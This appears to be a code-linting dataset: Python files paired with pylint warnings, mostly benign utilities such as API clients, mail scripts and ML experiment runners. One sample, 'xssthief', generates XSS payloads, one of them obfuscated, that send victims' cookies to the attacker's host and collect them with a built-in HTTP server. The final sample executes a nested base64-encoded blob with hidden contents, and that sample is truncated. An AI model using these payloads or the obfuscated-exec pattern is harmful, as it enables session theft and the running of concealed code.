code
stringlengths
20
13.2k
label
stringlengths
21
6.26k
1 import requests 2 import json 3 import functools 4 import logging 5 # from collections import defaultdict 6 # from xml.etree import ElementTree 7 8 9 # ref: https://stackoverflow.com/questions/7684333/converting-xml-to-dictionary-using-elementtree 10 # def etree_to_dict(t): 11 # d = {t.tag: {} if t.attrib else None} 12 # children = list(t) 13 # if children: 14 # dd = defaultdict(list) 15 # for dc in map(etree_to_dict, children): 16 # for k, v in dc.items(): 17 # dd[k].append(v) 18 # d = {t.tag: {k: v[0] if len(v) == 1 else v 19 # for k, v in dd.items()}} 20 # if t.attrib: 21 # d[t.tag].update(('@' + k, v) 22 # for k, v in t.attrib.items()) 23 # if t.text: 24 # text = t.text.strip() 25 # if children or t.attrib: 26 # if text: 27 # d[t.tag]['#text'] = text 28 # else: 29 # d[t.tag] = text 30 # return d 31 32 33 logger = logging.getLogger(__name__) 34 35 36 entrypoint = '/api' 37 38 39 class PRTGError(Exception): 40 pass 41 42 43 class PRTGAuthenticationError(PRTGError): 44 pass 45 46 47 class ResponseTypes: 48 @staticmethod 49 def json(data): 50 return json.loads(data) 51 52 # @staticmethod 53 # def xml(data): 54 # return etree_to_dict(ElementTree.XML(data)) 55 56 57 class API: 58 def __init__(self, host, username, passhash): 59 self._requests = requests 60 self._host = host 61 self._authparams = { 62 "username": username, 63 "passhash": passhash 64 } 65 66 @property 67 def requests(self): 68 return self._requests 69 70 @requests.setter 71 def requests(self, val): 72 self._requests = val 73 74 def _call(self, method, response_type=None, **params): 75 if response_type is None: 76 response_type = 'json' 77 if not hasattr(ResponseTypes, response_type): 78 raise ValueError("Unknown response type", response_type) 79 url = '%s%s/%s.%s' % (self._host, entrypoint, method, response_type) 80 try: 81 params = dict(params, **self._authparams) 82 response = self._requests.get(url, params=params) 83 if response.status_code != 200: 84 logger.warning("Wrong exit code %d for %s", response.status_code, url) 85 raise PRTGError("Invalid HTTP code response", response.status_code) 86 return getattr(ResponseTypes, response_type)(response.content.decode('utf-8')) 87 except Exception as e: 88 raise PRTGError(e) from e 89 90 def __getattr__(self, item): 91 return functools.partial(self._call, item) 92 93 @staticmethod 94 def from_credentials(host, username, password, _requests=None): 95 url = '%s%s/getpasshash.htm' % (host, entrypoint) 96 params = { 97 "username": username, 98 "password": password, 99 } 100 if _requests is None: 101 _requests = requests.Session() 102 103 response = _requests.get(url, params=params) 104 if response.status_code != 200: 105 raise PRTGAuthenticationError("Couldn't authenticate", response.status_code, response.content) 106 result = API(host, username, response.content) 107 result.requests = _requests 108 return result 109
47 - refactor: too-few-public-methods
1 from locust import HttpLocust, TaskSet, task 2 3 class WebsiteTasks(TaskSet): 4 @task 5 def index(self): 6 self.client.get("/") 7 8 @task 9 def status(self): 10 self.client.get("/status") 11 12 @task 13 def hetarchief(self): 14 self.client.get("/status/hetarchief.png") 15 16 @task 17 def ftp(self): 18 self.client.get("/status/ftp.png") 19 20 class WebsiteUser(HttpLocust): 21 task_set = WebsiteTasks 22 min_wait = 5000 23 max_wait = 15000
20 - refactor: too-few-public-methods
1 import os 2 from flask import jsonify, Response 3 import flask 4 5 6 class FileResponse(Response): 7 default_mimetype = 'application/octet-stream' 8 9 def __init__(self, filename, **kwargs): 10 if not os.path.isabs(filename): 11 12 filename = os.path.join(flask.current_app.root_path, filename) 13 14 with open(filename, 'rb') as f: 15 contents = f.read() 16 17 response = contents 18 super().__init__(response, **kwargs) 19 20 21 class StatusResponse(FileResponse): 22 default_mimetype = 'image/png' 23 24 def __init__(self, status, **kwargs): 25 if status is True: 26 status = 'ok' 27 elif status is False: 28 status = 'nok' 29 else: 30 status = 'unk' 31 32 filename = 'static/status-%s.png' % (status,) 33 super().__init__(filename, **kwargs) 34 35 36 class Responses: 37 @staticmethod 38 def json(obj): 39 return jsonify(obj) 40 41 @staticmethod 42 def html(obj): 43 return Response('<html><body>%s</body></html>' % (obj,), content_type='text/html') 44 45 @staticmethod 46 def txt(obj): 47 if type(obj) is not str: 48 obj = '\n'.join(obj) 49 return Response(obj, content_type='text/plain') 50 51 @staticmethod 52 def status(status_): 53 return StatusResponse(status_)
6 - refactor: too-few-public-methods 21 - refactor: too-few-public-methods
1 #!/usr/bin/env python 2 # -*- coding: utf-8 -*- 3 # 4 5 # if you want to test this script, set this True: 6 # then it won't send any mails, just it'll print out the produced html and text 7 #test = False 8 test = False 9 10 #which kind of db is Trac using? 11 mysql = False 12 pgsql = False 13 sqlite = True 14 15 # for mysql/pgsql: 16 dbhost="localhost" 17 dbuser="database_user" 18 dbpwd="database_password" 19 dbtrac="database_of_trac" 20 #or for sqlite: 21 sqlitedb='/path/to/trac/db/trac.db' 22 #or if your db is in memory: 23 #sqlitedb=':memory:' 24 25 # the url to the trac (notice the slash at the end): 26 trac_url='https://trac.example.org/path/to/trac/' 27 # the default domain, where the users reside 28 # ie: if no email address is stored for them, username@domain.tld will be used 29 to_domain="@example.org" 30 31 import codecs, sys 32 sys.setdefaultencoding('utf-8') 33 import site 34 35 # importing the appropriate database connector 36 # (you should install one, if you want to use ;) 37 # or you can use an uniform layer, like sqlalchemy) 38 if mysql: 39 import MySQLdb 40 if pgsql: 41 import psycopg2 42 if sqlite: 43 from pysqlite2 import dbapi2 as sqlite 44 45 import time 46 import smtplib 47 from email.mime.multipart import MIMEMultipart 48 from email.mime.text import MIMEText 49 db = None 50 cursor = None 51 52 try: 53 if mysql: 54 db = MySQLdb.connect(host=dbhost, user=dbuser, passwd=dbpwd, db=dbtrac) 55 if pgsql: 56 db = psycopg2.connect("host='"+ dbhost +"' user='" + dbuser + "' password='" + dbpwd + "' dbname='" + dbtrac + "'") 57 if sqlite: 58 db = sqlite.connect(sqlitedb) 59 except: 60 print "cannot connect to db" 61 raise 62 sys.exit(1) 63 64 cursor = db.cursor() 65 66 fields = ['summary', 'component', 'priority', 'status', 'owner', 'reporter'] 67 68 #I think MySQL needs '"' instead of "'" without any ';', 69 # with more strict capitalization (doubling quotes mean a single quote ;) ) 70 # so you'll have to put these queries into this format: 71 # sql="""query""" or sql='"query"' like 72 # sql = '"SELECT owner FROM ticket WHERE status !=""closed""""' 73 # for postgresql simply use: 74 sql = "select id, %s from ticket where status == 'testing' or status == 'pre_testing';" % ', '.join(fields) 75 cursor.execute(sql) 76 tickets = cursor.fetchall() 77 tickets_dict = {} 78 79 # Reading last exec time 80 last_exec_path = '/var/local/trac_testing_tickets_notify_last_exec_timestamp' 81 last_exec = 0 82 try: 83 f = open(last_exec_path, "r") 84 last_exec = int(f.read()) 85 f.close() 86 except: 87 last_exec = 0 88 89 cur_time = int(time.time()) 90 notify_tickets = set() 91 time_quant = 86400 # seconts per day - frequence of reminds 92 ticket_url = 'https://trac.example.org/path/to/trac/ticket/' 93 94 recipient_list = ['recipient1@example.org', 'recipient2@example.arg', ] 95 96 for ticket in tickets: 97 tickets_dict[ticket[0]] = {'id': ticket[0]} 98 offset = 1 99 for field in fields: 100 tickets_dict[ticket[0]][field] = ticket[offset] 101 offset += 1 102 103 sql = "select time from ticket_change where ticket == %d and field == 'status' and (newvalue == 'testing' or newvalue == 'pre_testing') order by time desc limit 1;" % ticket[0] 104 cursor.execute(sql) 105 last_time = cursor.fetchall() 106 if len(last_time) > 0: 107 last_time = last_time[0][0] 108 if (int((cur_time - last_time) / time_quant) != int((last_exec - last_time) / time_quant)) and int((cur_time - last_time) / time_quant) > 0: 109 notify_tickets |= set([ticket[0], ]) 110 111 # No new tickets - aborting 112 if len(notify_tickets) == 0: 113 print 'No new tickets: aborting.' 114 exit() 115 116 #calculating column widths 117 column_widths = {} 118 for id in notify_tickets: 119 for field, value in tickets_dict[id].iteritems(): 120 column_widths[field] = field in column_widths and max(column_widths[field], len("%s" % value)) or max(len("%s" % value), len("%s" % field)) 121 122 #generating mail text 123 msg_header = """ 124 List of tickets pending your attention: 125 """ 126 msg_tail = """ 127 Trac testing tickets notification script. 128 """ 129 header_line_template = '|| %%(id)%ds ||' % (len(ticket_url) + column_widths['id']) 130 normal_line_template = '|| %s%%(id)%ds ||' % (ticket_url, column_widths['id']) 131 line_template = '' 132 for field in fields: 133 line_template += ' %%(%s)%ds ||' % (field, column_widths[field]) 134 135 header = { 'id' : 'URL' } 136 for field in fields: 137 header[field] = field 138 table_header = (header_line_template + line_template) % header 139 140 table = [] 141 for id in notify_tickets: 142 table.append((normal_line_template + line_template) % tickets_dict[id]) 143 144 msg = '\n'.join ([msg_header, table_header] + table + [msg_tail]) 145 146 htmlmsg_header = ''' 147 <html> 148 <head> 149 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 150 </head> 151 <body> 152 <table> 153 ''' 154 htmlmsg_tail = ''' 155 </table> 156 </body> 157 </html> 158 ''' 159 160 normal_line_template = '<td><a href="%s%%(id)s">%%(id)s</a></td>' % ticket_url 161 line_template = '' 162 for field in fields: 163 line_template += '<td>%%(%s)s</td>' % field 164 165 htmltable_header = '<tr><th>' + '</th><th>'.join(['Ticket'] + fields) + '</th></tr>' 166 htmltable = [] 167 for id in notify_tickets: 168 htmltable.append(('<tr>' + normal_line_template + line_template + '</tr>') % tickets_dict[id]) 169 170 htmlmsg = '\n'.join ([htmlmsg_header, htmltable_header] + htmltable + [htmlmsg_tail]) 171 172 import email.Charset 173 email.Charset.add_charset('utf-8', email.Charset.SHORTEST, None, None) 174 175 if test: 176 print msg 177 print 178 print htmlmsg 179 else: 180 mailmsg = MIMEMultipart('alternative') 181 mailmsg['Subject'] = "Report testing Tickets at %s" % time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())) 182 mailmsg['From'] = 'trac@example.org' 183 mailmsg['To'] = ', '.join(recipient_list) 184 185 part1 = MIMEText(msg, 'plain') 186 part2 = MIMEText(htmlmsg.encode('utf-8', 'replace'), 'html', 'utf-8') 187 188 mailmsg.attach(part1) 189 mailmsg.attach(part2) 190 191 s = smtplib.SMTP() 192 s.connect() 193 s.sendmail(mailmsg['From'], recipient_list, mailmsg.as_string()) 194 s.close() 195 196 f = open(last_exec_path, "w") 197 f.write("%s" % cur_time) 198 f.close()
60 - error: syntax-error
1 import os 2 import random 3 import smtplib # Email 4 from dotenv import load_dotenv # For getting stored password 5 #import getpass # For dynamically enter password 6 7 load_dotenv() 8 9 username = input("E-mail: ") # e.g. "your_gmail_to_send_from@gmail.com" 10 password = os.getenv("PASSWORD") # alternatively: getpass.getpass() 11 12 def santa_message_body(santa_assigment): 13 return f"Your secret santa assignment is {santa_assigment}." 14 15 def send_email(to_person, to_email, subject, message_body): 16 17 server = smtplib.SMTP('smtp.gmail.com', 587) 18 server.ehlo() 19 server.starttls() 20 server.login(username, password) 21 22 sender_name = "Rami Manna" 23 message = f"""From: {sender_name} <{username}> 24 To: {to_person} <{to_email}> 25 MIME-Version: 1.0 26 Content-type: text/html 27 Subject: {subject} 28 29 {message_body} 30 31 """ 32 33 server.sendmail(username, to_email, message) 34 server.quit() 35 36 37 def send_secret_santas(participants): 38 not_gifted = {name for name, email in participants} 39 for name, email in participants: 40 santa_assigment = random.choice(list(not_gifted - {name})) 41 not_gifted.remove(santa_assigment) 42 43 message_body = santa_message_body(santa_assigment) 44 subject = "Your Secret Santa Assignment!" 45 send_email(name, email, subject, message_body) 46 47 PARTICIPANTS = [('Harry Potter', 'potter@hogwarts.edu'), ('Hermione Granger', "hermione@hogwarts.edu")] 48 49 if __name__ == "__main__": 50 51 send_secret_santas(PARTICIPANTS) 52
Clean Code: No Issues Detected
1 import requests 2 import json 3 import pandas as pd 4 url = "https://maps.googleapis.com/maps/api/place/textsearch/json" 5 key = "change_this" 6 cities = [ 7 'jakarta', 8 'surabaya', 9 'malang', 10 'semarang' 11 ] 12 cols = ['street_address', 'lat', 'long'] 13 df = pd.DataFrame(columns=cols) 14 15 for city in cities: 16 querystring = {"query":f"indomaret in {city}","key":key} 17 res = requests.request("GET", url, params=querystring) 18 json_res = json.loads(res.text) 19 for result in json_res['results']: 20 address = result['formatted_address'] 21 lat = result['geometry']['location']['lat'] 22 lng = result['geometry']['location']['lng'] 23 df = df.append(pd.Series([address, lat, lng], index=cols), ignore_index=True) 24 df.to_csv('for_pepe.csv', index=False)
17 - warning: missing-timeout
1 from learn import ModelTrainer 2 from collection import Collection 3 import pandas as pd 4 5 import logging 6 import traceback 7 import os 8 9 logging.basicConfig() 10 logger = logging.getLogger(__name__) 11 logger.setLevel(logging.INFO) 12 13 # === THESIS === 14 15 anbieter_config = { 16 'Construction': [ 17 'Alpiq AG', 18 'KIBAG', 19 'Egli AG', 20 ], 21 'IT': [ 22 'Swisscom', 23 'ELCA Informatik AG', 24 'Unisys', 25 ], 26 'Other': [ 27 'Kummler + Matter AG', 28 'Thermo Fisher Scientific (Schweiz) AG', 29 'AXA Versicherung AG', 30 ], 31 'Diverse': [ 32 'Siemens AG', 33 'ABB', 34 'Basler & Hofmann West AG', 35 ] 36 } 37 38 39 40 # === TESTING === 41 42 #anbieter = 'Marti AG' #456 43 #anbieter = 'Axpo AG' #40 44 #anbieter = 'Hewlett-Packard' #90 45 #anbieter = 'BG Ingénieurs Conseils' SA #116 46 #anbieter = 'Pricewaterhousecoopers' #42 47 #anbieter = 'Helbling Beratung + Bauplanung AG' #20 48 #anbieter = 'Ofrex SA' #52 49 #anbieter = 'PENTAG Informatik AG' #10 50 #anbieter = 'Wicki Forst AG' #12 51 #anbieter = 'T-Systems Schweiz' #18 52 #anbieter = 'Bafilco AG' #20 53 #anbieter = '4Video-Production GmbH' #3 54 #anbieter = 'Widmer Ingenieure AG' #6 55 #anbieter = 'hmb partners AG' #2 56 #anbieter = 'Planmeca' #4 57 #anbieter = 'K & M Installationen AG' #4 58 59 60 select = ( 61 "ausschreibung.meldungsnummer, " 62 "anbieter.institution as anbieter_institution, " 63 "auftraggeber.beschaffungsstelle_plz, " 64 "ausschreibung.gatt_wto, " 65 "ausschreibung.sprache, " 66 "ausschreibung.auftragsart, " 67 "ausschreibung.auftragsart_art, " 68 "ausschreibung.lose, " 69 "ausschreibung.teilangebote, " 70 "ausschreibung.varianten, " 71 "ausschreibung.bietergemeinschaft, " 72 "cpv_dokument.cpv_nummer as ausschreibung_cpv" 73 ) 74 75 attributes = ['ausschreibung_cpv', 'auftragsart_art', 'beschaffungsstelle_plz', 'auftragsart', 'gatt_wto','lose','teilangebote', 'varianten','sprache'] 76 #attributes = ['auftragsart_art', 'beschaffungsstelle_plz', 'auftragsart', 'ausschreibung_cpv', 'gatt_wto','teilangebote', 'sprache'] 77 #attributes = ['ausschreibung_cpv', 'auftragsart_art', 'beschaffungsstelle_plz', 'auftragsart', 'gatt_wto','lose','teilangebote', 'varianten','sprache'] 78 # attributes = [ 79 # [ 'ausschreibung_cpv', 'auftragsart_art' ], 80 # [ 'ausschreibung_cpv', 'beschaffungsstelle_plz' ], 81 # [ 'ausschreibung_cpv', 'auftragsart' ], 82 # [ 'ausschreibung_cpv', 'gatt_wto' ], 83 # [ 'ausschreibung_cpv', 'lose' ], 84 # [ 'ausschreibung_cpv', 'teilangebote' ], 85 # [ 'ausschreibung_cpv', 'varianten' ], 86 # [ 'ausschreibung_cpv', 'sprache' ] 87 # ] 88 89 config = { 90 # ratio that the positive and negative responses have to each other 91 'positive_to_negative_ratio': 0.5, 92 # Percentage of training set that is used for testing (Recommendation of at least 25%) 93 'test_size': 0.25, 94 'runs': 100, 95 #'enabled_algorithms': ['random_forest'], 96 'enabled_algorithms': ['random_forest', 'decision_tree', 'gradient_boost'], 97 'random_forest': { 98 # Tune Random Forest Parameter 99 'n_estimators': 100, 100 'max_features': 'sqrt', 101 'max_depth': None, 102 'min_samples_split': 4 103 }, 104 'decision_tree': { 105 'max_depth': 30, 106 'max_features': 'sqrt', 107 'min_samples_split': 4 108 }, 109 'gradient_boost': { 110 'n_estimators': 100, 111 'learning_rate': 0.1, 112 'max_depth': 30, 113 'min_samples_split': 4, 114 'max_features': 'sqrt' 115 } 116 } 117 118 119 class IterationRunner(): 120 121 def __init__(self, anbieter_config, select, attributes, config): 122 self.anbieter_config = anbieter_config 123 self.select = select 124 self.attributes = attributes 125 self.config = config 126 self.trainer = ModelTrainer(select, '', config, attributes) 127 self.collection = Collection() 128 129 def run(self): 130 for label, anbieters in self.anbieter_config.items(): 131 logger.info(label) 132 for anbieter in anbieters: 133 for attr_id in range(len(self.attributes)): 134 att_list = self.attributes[:attr_id+1] 135 self.singleRun(anbieter, att_list, label) 136 self.trainer.resetSQLData() 137 138 def runAttributesEachOne(self): 139 for label, anbieters in self.anbieter_config.items(): 140 logger.info(label) 141 for anbieter in anbieters: 142 for attr in self.attributes: 143 att_list = [attr] 144 self.singleRun(anbieter, att_list, label) 145 self.trainer.resetSQLData() 146 147 def runAttributesList(self): 148 for label, anbieters in self.anbieter_config.items(): 149 logger.info(label) 150 for anbieter in anbieters: 151 for att_list in self.attributes: 152 self.singleRun(anbieter, att_list, label) 153 self.trainer.resetSQLData() 154 155 def runSimpleAttributeList(self): 156 for label, anbieters in self.anbieter_config.items(): 157 logger.info(label) 158 for anbieter in anbieters: 159 self.singleRun(anbieter, self.attributes, label) 160 self.trainer.resetSQLData() 161 162 def singleRun(self, anbieter, att_list, label): 163 logger.info('label: {}, anbieter: {}, attributes: {}'.format(label, anbieter, att_list)) 164 try: 165 self.trainer.attributes = att_list 166 self.trainer.anbieter = anbieter 167 output = self.trainer.run() 168 output['label'] = label 169 self.collection.append(output) 170 filename = os.getenv('DB_FILE', 'dbs/auto.json') 171 self.collection.to_file(filename) 172 except Exception as e: 173 traceback.print_exc() 174 print(e) 175 print('one it done') 176 177 runner = IterationRunner(anbieter_config, select, attributes, config) 178 179 if __name__ == '__main__': 180 # runner.collection.import_file('dbs/auto.json') 181 runner.run() 182 runner.runAttributesEachOne() 183 runner.runAttributesList() 184 # label, anbieters = next(iter(runner.anbieter_config.items())) 185 # print(label)
121 - warning: redefined-outer-name 121 - warning: redefined-outer-name 121 - warning: redefined-outer-name 121 - warning: redefined-outer-name 163 - warning: logging-format-interpolation 172 - warning: broad-exception-caught 3 - warning: unused-import
1 import configparser 2 import sqlalchemy 3 4 # git update-index --skip-worktree config.ini 5 6 7 config = configparser.ConfigParser() 8 9 10 config.read("config.ini") 11 12 connection_string = 'mysql+' + config['database']['connector'] + '://' + config['database']['user'] + ':' + config['database']['password'] + '@' + config['database']['host'] + '/' + config['database']['database'] 13 14 if __name__ == "__main__": 15 for item, element in config['database'].items(): 16 print('%s: %s' % (item, element)) 17 print(connection_string) 18 else: 19 engine = sqlalchemy.create_engine(connection_string) 20 connection = engine.connect()
Clean Code: No Issues Detected
1 import json 2 import pandas as pd 3 import warnings 4 5 class Collection(): 6 7 algorithms = ['gradient_boost', 'decision_tree', 'random_forest'] 8 9 def __init__(self): 10 self.list = [] 11 12 13 def append(self, item): 14 self.list.append(item) 15 16 def __iter__(self): 17 return iter(self.list) 18 19 def get_all_as_df(self, algorithm): 20 try: 21 tmp = [] 22 for iteration in self.list: 23 tmp.append(iteration[algorithm]['metadata']) 24 return pd.DataFrame(tmp, index=[iteration['anbieter'] for iteration in self.list]) 25 except: 26 warnings.warn('Select an algorithm: "random_forest", "gradient_boost" or "decision_tree"') 27 28 def df_row_per_algorithm(self): 29 tmp = [] 30 for iteration in self.list: 31 for algorithm in self.algorithms: 32 output = iteration[algorithm]['metadata'] 33 evaluation_dataframe = pd.DataFrame.from_dict(iteration[algorithm]['data']) 34 # missing metrics 35 output['acc_std'] = evaluation_dataframe['accuracy'].std() 36 evaluation_dataframe['MCC'] = evaluation_dataframe['MCC']*100 37 output['mcc_std'] = evaluation_dataframe['MCC'].std() 38 output['fn_std'] = evaluation_dataframe['fn_rate'].std() 39 40 output['anbieter'] = iteration['anbieter'] 41 output['label'] = iteration['label'] 42 output['algorithm'] = algorithm 43 output['attributes'] = ",".join(iteration['attributes']) 44 tmp.append(output) 45 return pd.DataFrame(tmp) 46 47 def to_json(self, **kwargs): 48 return json.dumps(self.list, **kwargs) 49 50 def to_file(self, filename): 51 with open(filename, 'w') as fp: 52 json.dump(self.list, fp, indent=4, sort_keys=True) 53 54 def import_file(self, filename, force=False): 55 if len(self.list) and not force: 56 warnings.warn("Loaded Collection, pls add force=True") 57 else: 58 with open(filename, 'r') as fp: 59 self.list = json.load(fp)
25 - warning: bare-except 19 - refactor: inconsistent-return-statements 51 - warning: unspecified-encoding 58 - warning: unspecified-encoding
1 #!/usr/bin/python3 2 3 import argparse 4 import os 5 from http.server import HTTPServer, BaseHTTPRequestHandler 6 from urllib.parse import parse_qs 7 from requests import * 8 ip = get('https://api.ipify.org').text 9 10 parser = argparse.ArgumentParser(description='creates xss payloads and starts http server to capture responses and collect cookies', epilog='xssthief --error 10.10.10.50' + '\n' + 'xssthief --image 10.10.10.50' + '\n' + 'xssthief --obfuscated 10.10.10.50', formatter_class=argparse.RawTextHelpFormatter) 11 parser.add_argument('lhost', help='ip address of listening host') 12 parser.add_argument('-e', '--error', action='store_true', help='create error payload') 13 parser.add_argument('-i', '--image', action='store_true', help='create image payload') 14 parser.add_argument('-o', '--obfuscated', action='store_true', help='create obfuscated payload') 15 args = parser.parse_args() 16 17 lhost = ip 18 19 class handler(BaseHTTPRequestHandler): 20 def do_GET(self): 21 qs = {} 22 path = self.path 23 if '?' in path: 24 path, temp = path.split('?', 1) 25 qs = parse_qs(temp) 26 print(qs) 27 28 def serve(): 29 print('Starting server, press Ctrl+C to exit...\n') 30 address = (lhost, 80) 31 httpd = HTTPServer(address, handler) 32 try: 33 httpd.serve_forever() 34 except KeyboardInterrupt: 35 httpd.server_close() 36 print('\nBye!') 37 38 def obfuscate(): 39 js = '''document.write('<img src=x onerror=this.src="http://''' + lhost + '''/?cookie="+encodeURI(document.getElementsByName("cookie")[0].value)>');''' 40 ords = ','.join([str(ord(c)) for c in js]) 41 payload = '<img src="/><script>eval(String.fromCharCode(' + ords + '))</script>" />' 42 return payload 43 44 def err_payload(): 45 xss = '''<img src=x onerror=this.src='http://''' + lhost + '''/?cookie='+document.cookie>''' 46 print('[*] Your payload: ' + xss + '\n') 47 serve() 48 49 def img_payload(): 50 xss = '''<new Image().src='http://''' + lhost + '''/?cookie='+document.cookie>''' 51 print('[*] Your payload: ' + xss + '\n') 52 serve() 53 54 def obs_payload(): 55 xss = obfuscate() 56 print('[*] Your payload: ' + xss + '\n') 57 serve() 58 59 def main(): 60 if args.obfuscated: 61 obs_payload() 62 elif args.error: 63 err_payload() 64 elif args.image: 65 img_payload() 66 else: 67 parser.print_help() 68 69 main()
20 - warning: bad-indentation 21 - warning: bad-indentation 22 - warning: bad-indentation 23 - warning: bad-indentation 24 - warning: bad-indentation 25 - warning: bad-indentation 26 - warning: bad-indentation 29 - warning: bad-indentation 30 - warning: bad-indentation 31 - warning: bad-indentation 32 - warning: bad-indentation 33 - warning: bad-indentation 34 - warning: bad-indentation 35 - warning: bad-indentation 36 - warning: bad-indentation 39 - warning: bad-indentation 40 - warning: bad-indentation 41 - warning: bad-indentation 42 - warning: bad-indentation 45 - warning: bad-indentation 46 - warning: bad-indentation 47 - warning: bad-indentation 50 - warning: bad-indentation 51 - warning: bad-indentation 52 - warning: bad-indentation 55 - warning: bad-indentation 56 - warning: bad-indentation 57 - warning: bad-indentation 60 - warning: bad-indentation 61 - warning: bad-indentation 62 - warning: bad-indentation 63 - warning: bad-indentation 64 - warning: bad-indentation 65 - warning: bad-indentation 66 - warning: bad-indentation 67 - warning: bad-indentation 7 - warning: redefined-builtin 7 - warning: wildcard-import 8 - warning: missing-timeout 4 - warning: unused-import 7 - warning: unused-wildcard-import
1 #-------------------------------------------------# 2 # Obfuscate By Mr.GamingThanks To Black Coder Crush 3 # github : https://github.com/clayhacker-max 4 # from Linux 5 # localhost : aarch64 6 # key : Asep-fA6bC2eA6tB8lX8 7 # date : Fri Jul 16 13:54:16 2021 8 #-------------------------------------------------# 9 #Compile By DNMODZ 10 #My Team : Black Coder Crush 11 import base64 12 exec(base64.b64decode("I0NvbXBpbGUgQnkgRE5NT0RaCiNNeSBUZWFtIDogQmxhY2sgQ29kZXIgQ3J1c2gKaW1wb3J0IGJhc2U2NApleGVjKGJhc2U2NC5iNjRkZWNvZGUoIkkwTnZiWEJwYkdVZ1Fua2dSRTVOVDBSYUNpTk5lU0JVWldGdElEb2dRbXhoWTJzZ1EyOWtaWElnUTNKMWMyZ0thVzF3YjNKMElHSmhjMlUyTkFwbGVHVmpLR0poYzJVMk5DNWlOalJrWldOdlpHVW9Ja2t3VG5aaVdFSndZa2RWWjFGdWEyZFNSVFZPVkRCU1lVTnBUazVsVTBKVldsZEdkRWxFYjJkUmJYaG9XVEp6WjFFeU9XdGFXRWxuVVROS01XTXlaMHRoVnpGM1lqTktNRWxIU21oak1sVXlUa0Z3YkdWSFZtcExSMHBvWXpKVk1rNUROV2xPYWxKcldsZE9kbHBIVlc5SmEydDNWRzVhYVZkRlNuZFphMlJXV2pGR2RXRXlaRk5TVkZaUFZrUkNVMWxWVG5CVWF6VnNWVEJLVmxkc1pFZGtSV3hGWWpKa1VtSllhRzlYVkVwNldqRkZlVTlYZEdGWFJXeHVWVlJPUzAxWFRYbGFNSFJvVm5wR00xbHFUa3ROUld4SVUyMW9hazFzVlhsVWEwWjNZa2RXU0ZadGNFeFNNSEJ2V1hwS1ZrMXJOVVJPVjJ4UFlXeEtjbGRzWkU5a2JIQklWbGM1U21FeWRETldSelZoWVZaa1JsTnVaRnBoTWxKWFYycEdSMlJYUlhsYVJrNVRWa1phVUZaclVrTlZNV3hXVkc1Q1ZXRjZWbk5XVkVKTFZteGtjMXBGWkd0U1YzaEdXV3BLYTFWdFNsbGhSemxZVmtWd05sZHFSa1psVlRsWVpFZEdXRkpYZUhWV1ZsSlBVekF4V0ZSWWJHRk5TRkp2Vm01d1IwMHhiSEZVYTNST1VsZDRTVlV5TVc5aGF6RnpWbGhzVldFd1dqTlphMlJYVTBaYWRHTkZlRk5OU0VKMlYxaHdTMVpyTVhKT1ZWSlBWako0VUZsWGVFdGpiR1J6V2tVNWEySklRa2xXYkdNMVUyMUZlV1JFVGxkU2VsWm9XVlphYTFKc1RuVmFSbkJvVFd4S1dGWXljRWRTTWxKWVVsaHNZVkpyTlZSV2ExcGhWVVphY2xWclRsWk5WM2hYVmtjMVExWlhSalpXYms1WFZrVktURlp0ZUd0ak1YQkdXa2QwVTFZemFFZFhWM0JMWVRGV2RGTnNiR2hTZW14WlZtdFdkMDVzWkhGU2ExcHNWbFJzV1ZwRlpFZFhSa3BZWlVoV1YxWnNTbEJWZWtGNFYwWlNXV0pIUms1VFJrcDJWbTAxZDFJd01IaGlTRVpWWVROU1QxVnNaRFJUVmxWNVRWYzVhR0Y2Um5wV2JHaHpWbGRGZDFkcVRscGhNbEpZVlRCYVlXUkhUa1psUms1T1UwVktNbFl4YUhkVE1WcHlUVmhLVDFaV1NsQldha28wVlVac1dHVkZkR3BpUjFKNlYydFZOV0V5U2tsUmEyeFhZa2ROTVZVeU1VdFdiR1J6WWtaV1YySlhhSGxYVmxwV1pESlJlVk5ZY0dGU2JFcFlWbXBLYjFWV1draGxSM1JWVFVSQ00xUldWbUZoTVVsNVlVWm9ZVll6VW1GYVYzaHJWMGRPUms5V1VrNVNSVnBJVjFkMFYySXhWa2RhUld4U1lURndXRlp0TVc5U1JuQkZVbTVPYWsxcldrZFdSekV3WVZaYVZWWllhRmRpUm5CeVdWUktSbVZHVGxsaVIzaFRVbFZ3V2xkWGRGZFdNREI0Vm1wYVZHRXlVbGxWYkZKSFYyeGtjbHBJVGxWaGVrWkpWREZTVDFack1WZFhibHBYVWtWd1ZGbDZTa1psYlVwSVpFWk9UazF0YURWV2JGcGhWVEZGZUZWclpHbFNiVkpoVkZSS2IyTnNVbGhrU0U1UFlrWldOVmt3Vms5V1IwcEdUbFZrV2sxSFRURldNakZMVmxaS2MxVnRSbE5sYTFwTlZteGtlbVZHU25SVmExcHFVbFJXVkZacldsZE9WbHB4VTJwQ2FFMVdjSHBaYWs1dlYwZEZlV0ZJUWxaTlJuQk1XVlZhWVZZeFZuSlViRlpUWWxaSmQxWkhlRmROUjBWNVUyeGFhbEpzV2xkV2JuQkdaREZaZVdWSGRGTk5WVFV4VmtjeFIxVXhXWGhUYWxwWVlURmFhRnBFUm1GU01VcDFWbXhLYVZZemFGcFdWM2hYWkcxV1YxcEdWbFJXUlZwWFdXdGpOVTVHYTNkV2JUbFdUV3RhZVZVeU1XOVdNREZIWTBWNFlWSkZXbnBaZWtaM1VqRmtjMVp0YUU1U1JsWXpWbXRrTkdJeGJGaFNXR3hYWWtad1ZGWnJXbUZXVmxweldrWk9WMUp0ZUZkWGExcFBWa1pLYzJOSWFGWldla1oyVm1wS1YyTnNaSFZqUm1SVFZqQTBlbFpHV210Vk1sSkhWbTVHVjJKVldrOVVWVlozVWpGYWMxZHRPVkpOYkVwNldXdG9SMVpYU2toVmJrNVhZa2RSTUZWdGVGTldiSEJJWkVkb1YwMUlRbGRYVmxKUFpERmFWMU5xV2xOaWJIQm9WVzV3UjFaR1dYaFhhemxYWVhwV1YxWlhNWE5XTVVwWFlqTndWMDFYVGpOVVZscGFaREF4VmxwSGNGTmlSWEJVVm0xMGEwNUdUWGhXYmxacVVtMVNUMWxyYUVOVGJHeFpZMFZrYUUxVmJETldNbmh6VmxkS1IxTnJhRnBXUlZwTFdsVmFZV05yT1ZkVGF6Vm9ZVEZ3VmxZeFdsZGhNVmw0VjJ0a1UySkdXbkJWYkdoRFZrWndXR1ZHY0d4V2JWSjVXVlZvUzFSc1dYZFdhbEphWVRGd2VsbFZWWGhTVmxweVZteHdhVkpyY0VsV1JtUTBZekpTUms1V1pGVmlWM2hQVldwT2IxSXhXa2RXYlhSb1RXdGFXVlV5ZUZkaFJUQjZVV3hhVm1